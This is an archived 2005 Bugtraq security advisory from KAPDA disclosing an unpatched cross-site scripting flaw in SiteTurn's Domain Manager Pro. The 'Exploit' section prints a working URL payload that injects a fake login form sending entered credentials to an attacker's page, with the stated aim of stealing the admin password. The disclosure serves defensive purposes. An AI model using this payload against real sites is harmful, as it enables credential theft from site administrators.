lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 21 Oct 2005 22:03:54 -0000 From: advisory@...urityfocus.com, kapda.ir@...urityfocus.com To: bugtraq@...urityfocus.com Subject: [KAPDA::#8] Domain Manager Pro Vulnerability [KAPDA::#8] Domain Manager Pro Vulnerability Domain Manager Pro - Fake form injection KAPDA New advisory Vulnerable Products : Domain Manager Pro Vendor: SiteTurn ,http://www.siteturn.com/ Vulnerability: Fake form injection ( XSS) Date : -------------------- 2005/08/08 1384/05/17 (Hijri Shamsi) About Domain Manager Pro: -------------------- SiteTurn's custom designed account control solution, for your Linux based website. Domain Manager Pro gives you all of the tools you'll need to manage, grow, and maintain your website and business to the maximum potential, well into the future. Vendor`s Description : http://www.siteturn.com/pop/serverSoft/domMan.htm Disscution: -------------------- A remote user can conduct cross-site scripting attacks.The 'panel' script does not properly validate user-supplied input at the 'err' parameter.So remote user can inject html script to fake login form and steal admin`s password. Exploit: -------------------- http://[target]/admin/panel?err=Please Login Again<br><font color="black"><form method="POST" action=[Your Page That Saves Data]>Username: <input name="user"><br>Password: <input name="pass"> <br><input type="Submit" name="subit" value="Login"><noscript> Solution: -------------------- Not patched yet by vendor. More Detail: -------------------- http://www.kapda.ir/advisory-96.html Visit above link for more details. Credit : -------------------- Farhad Koosha of KAPDA farhadkey [ at } kapda.ir Kapda - Security Science Researchers Insitute of Iran http://www.KAPDA.ir (PersianHacker.NET)
Powered by blists - more mailing lists